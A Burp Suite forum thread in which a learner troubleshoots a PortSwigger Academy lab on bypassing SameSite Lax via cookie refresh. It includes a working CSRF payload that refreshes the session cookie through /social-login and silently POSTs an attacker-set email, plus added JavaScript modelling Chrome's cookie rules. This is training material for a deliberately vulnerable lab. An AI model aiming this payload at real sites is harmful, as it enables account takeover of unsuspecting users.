Burp Suite User Forum


Problem with Solving the SameSite Lax bypass via cookie refresh lab

kaiwhata | Last updated: Oct 03, 2024 09:47PM UTC

I've tried to complete the https://portswigger.net/web-security/learning-paths/csrf/csrf-bypassing-samesite-lax-restrictions-with-newly-issued-cookies/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-cookie-refresh# several times over the last few days, but I can't get the lab to mark as Solved. I've checked that my payload works on Chrome and the Burp browser, and I've tried the payload from the solution (alongside a couple of others from the internet), but try as I might the lab won't recognise the completion for some reason. I'm making sure to change the email address each time as well. And I've completely restarted the lab 3 separate times (which usually fixes this issue with other labs). Any suggestions for what else to try? Here's my payload for reference:

```html
<form method="POST" action="https://labidx.web-security-academy.net/my-account/change-email">
  <input type="hidden" name="email" value="pwned@pwned.net">
</form>
<p>Click anywhere on the page</p>
<script>
  window.onclick = () => {
    window.open("https://labidx.web-security-academy.net/social-login");
    setTimeout(changeEmail, 5000);
  }
  function changeEmail() {
    document.forms[0].submit();
  }
</script>
```
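The payload above depends on a Chrome rule that the thread never spells out: a session cookie set without an explicit SameSite attribute is treated as Lax, but Chrome still attaches it to a top-level cross-site POST for roughly two minutes after it was set. Opening /social-login in a popup gets the site to issue a fresh cookie, and the 5-second delay leaves plenty of room inside that window (window.onclick is there only because window.open needs a user gesture to avoid the popup blocker). The following JavaScript is an added example, not code from the thread, the lab or PortSwigger; it models that decision so the exploit timeline can be checked offline. The 120-second window is Chrome's documented behaviour; the function names, the request/cookie shapes and the timestamps are this example's own assumptions.

```javascript
// Added example: a small model of Chrome's SameSite cookie rules, used to
// reason about why the cookie-refresh payload works. Not the lab's code.
// Assumption: a cookie with no SameSite attribute defaults to Lax but is
// still sent on top-level unsafe (POST) cross-site requests for 120 s
// after being set ("Lax-allowing-unsafe"). Names/timestamps are made up.

const LAX_ALLOWING_UNSAFE_WINDOW_MS = 120 * 1000;
const SAFE_METHODS = ['GET', 'HEAD', 'OPTIONS', 'TRACE'];

/**
 * Decide whether the browser attaches `cookie` to `request`.
 *   cookie:  { sameSite: 'Strict' | 'Lax' | 'None' | undefined, setAt: ms }
 *   request: { method, topLevel: boolean, sameSite: boolean, now: ms }
 */
function cookieSent(cookie, request) {
  if (request.sameSite) return true;              // same-site: always attached
  const defaulted = cookie.sameSite === undefined; // attribute omitted by the server
  const mode = defaulted ? 'Lax' : cookie.sameSite;
  const safeMethod = SAFE_METHODS.includes(request.method.toUpperCase());

  switch (mode) {
    case 'None':
      return true;                                 // (Secure flag required; not modelled)
    case 'Strict':
      return false;                                // never on cross-site requests
    case 'Lax':
      if (!request.topLevel) return false;         // iframes, fetch(), <img> etc.
      if (safeMethod) return true;                 // top-level GET navigation
      // Lax-allowing-unsafe: only for a defaulted-Lax cookie younger than 2 min
      return defaulted &&
        (request.now - cookie.setAt) < LAX_ALLOWING_UNSAFE_WINDOW_MS;
    default:
      return false;
  }
}

/**
 * Replay the exploit timeline from the payload: the victim logged in 10 minutes
 * ago, lands on the exploit page, optionally gets a fresh cookie via the
 * /social-login popup, then 5 s later the hidden form POSTs cross-site.
 * Returns true when the change-email request would carry the session cookie.
 */
function simulateExploit({ refreshCookie }) {
  const loginAt = 0;
  let cookie = { sameSite: undefined, setAt: loginAt }; // original session cookie
  let now = loginAt + 10 * 60 * 1000;                   // victim arrives 10 min later

  if (refreshCookie) {
    // window.open('/social-login') completes the OAuth flow; the server sets a
    // brand-new session cookie, again without a SameSite attribute.
    cookie = { sameSite: undefined, setAt: now };
  }

  now += 5000;                                          // setTimeout(changeEmail, 5000)
  return cookieSent(cookie, {
    method: 'POST', topLevel: true, sameSite: false, now,
  });
}

// Stand-alone run: with the refresh the POST is authenticated, without it not.
console.log('with refresh   :', simulateExploit({ refreshCookie: true }));  // true
console.log('without refresh:', simulateExploit({ refreshCookie: false })); // false
```

Two caveats the model makes visible: the refresh trick only helps while the cookie is younger than the window, so a delay of several minutes (or a cookie the server marks SameSite=Lax explicitly, which `cookieSent` treats as not defaulted) would fail, and a form submitted from inside an iframe rather than a top-level navigation never gets the cookie at all.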

Ben, PortSwigger Agent | Last updated: Oct 04, 2024 10:13AM UTC

Hi, To confirm, if you view the access log within this lab, after you have delivered your exploit, do you see any visits from the victim user?

kaiwhata | Last updated: Oct 06, 2024 08:46PM UTC

Ugh - I totally should have checked that! No - I'm not seeing any visits in the Access Log from the Victim user - which totally explains things. I'm only seeing incoming requests from a single IP.

Ben, PortSwigger Agent | Last updated: Oct 07, 2024 08:51AM UTC

Hi, We were experiencing some issues last week with the performance of the Web Academy environment and have since redeployed the environment - this might have impacted your efforts to solve this lab. I have just run through this particular lab right now and been able to solve it so it does appear to now be functioning as expected - if you try this again are you still seeing the same issues?

kaiwhata | Last updated: Oct 07, 2024 07:31PM UTC

Thanks - it's marked as solved now regardless. Whatever you did seems to have fixed it. I really appreciate the help!
